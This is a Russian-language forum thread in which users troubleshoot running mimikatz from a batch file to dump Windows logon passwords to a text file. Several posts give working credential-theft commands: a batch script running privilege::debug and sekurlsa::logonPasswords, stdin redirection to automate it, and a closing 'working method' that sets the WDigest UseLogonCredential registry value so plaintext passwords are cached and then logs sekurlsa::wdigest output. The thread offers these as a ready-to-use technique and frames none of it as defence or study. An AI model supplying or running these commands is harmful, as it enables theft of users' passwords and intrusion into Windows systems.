Статьи Ох уж этот mimikatz

Логи нужны, двух видов - что должно быть, и что есть. С конкретными командами.

 

Сейчас виртуалку включу и найду логи. Логи есть полные.

 

с практикой у всех беда...

 

Давно не пользовался, но днях понадобился. Никак не могу вывести результат в файл.
Ранее делал так батником:

Code:

if exist %windir%\SysWOW64\taskmgr.exe (goto x64)
start mimikatz privilege::debug
mimikatz sekurlsa::logonPasswords full>p.txt
:x64
cd x64
start mimikatz64 privilege::debug
mimikatz64 sekurlsa::logonPasswords full>p.txt
exit

Знаю корявый код, но работало, сейчас никак не хочет, хотя в консоли все пароли кажет.

Code:

mimikatz privilege::debug
mimikatz sekurlsa::logonPasswords

Что с "full" что без него.
Собссно требуется помощь по слогам, как бы это реализовать в батнике

 

Можно использовать stdin файл для ввода команд.

 

Я в программировании не силен, можно на примере как это можно реализовать?

 

Причём тут программирование? Стандартные функции перенаправления ввода/вывода - пользуясь консолью это нужно знать.

Code:

echo line 1>file.txt
echo line 2>>file.txt
type file.txt|program.exe

 

Сорян, просто не понял, что такое "stdin", начал гуглить он меня на С++ пинать начал. Спасибо за помощь.

 

согласен

 

Рабочий способ


reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

gpupdate /force

Перезайти
privilege::debug
log c:\intel\log.txt
sekurlsa::wdigest

sekurlsa::logonpasswords не покажет пароль . нужно сначала sekurlsa::wdigest